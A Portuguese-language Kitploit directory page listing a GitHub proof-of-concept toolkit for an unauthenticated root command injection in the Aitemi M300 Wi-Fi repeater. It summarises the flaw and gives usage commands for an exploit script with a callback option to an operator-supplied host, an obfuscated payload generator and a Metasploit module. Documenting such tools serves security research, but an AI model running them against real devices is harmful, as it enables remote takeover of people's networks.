Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
Ferramentas/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

Ver Repositório
2há 1 mêsAinda não revisado

CVE-2026-58457 - Injeção de Comandos do SO sem Autenticação no Repetidor Wi-Fi Aitemi M300 da Shenzhen

[!WARNING] Este código é fornecido COMO ESTÁ apenas para fins educacionais e de pesquisa. Não use este PoC em sistemas de produção, ambientes compartilhados ou quaisquer alvos não autorizados.

  • Executar ou hospedar este código pode acionar detecções de antivírus, alertas de monitoramento de segurança ou consequências legais se for mal utilizado.
  • Os autores e mantenedores do repositório não assumem nenhuma responsabilidade por qualquer dano, uso indevido ou atividade ilegal resultante deste código.
  • Use exclusivamente em ambientes de laboratório isolados com autorização adequada. Destinado apenas a pesquisa defensiva, análise de vulnerabilidades e testes de blue team.

Resumo da Vulnerabilidade

Existe uma vulnerabilidade sem autenticação de injeção de comandos do SO no handler smacfilter_conf. Os parâmetros GET name, enable e mac são passados sem sanitização para uma chamada sprintf() que constrói comandos UCI executados como root.

  • Severidade: Crítica (CVSS 9.8)
  • Impacto: Execução remota de comandos como root sem necessidade de autenticação

Ferramentas Incluídas

  • poc.py - Exploit completo com suporte a HTTPS, tentativas, timeout e exfiltração por callback.
  • val.py - Validador de vulnerabilidade seguro e passivo (usa o comando inofensivo id).
  • gen.py - Gerador avançado de payloads com múltiplas técnicas de ofuscação.
  • MITIGATIONS.md - Medidas defensivas recomendadas.
  • Módulo Metasploit - Disponível no diretório exploit/.

Instalação

root@kitploit:~
pip install requests

Uso Rápido

  1. Validar (Seguro)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Explorar (Somente Testes Autorizados)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Gerar Payloads Ofuscados
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Mover o Módulo
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Recarregar Tudo
root@kitploit:~
msfconsole -q -x "reload_all"

Referências

  • CVE-2026-58457
  • Advisory da VulnCheck
  • Divulgação no GitHub

Estrelas e contribuições são bem-vindas - especialmente melhorias em bypasses ou variantes adicionais de firmware.

Baixar ferramenta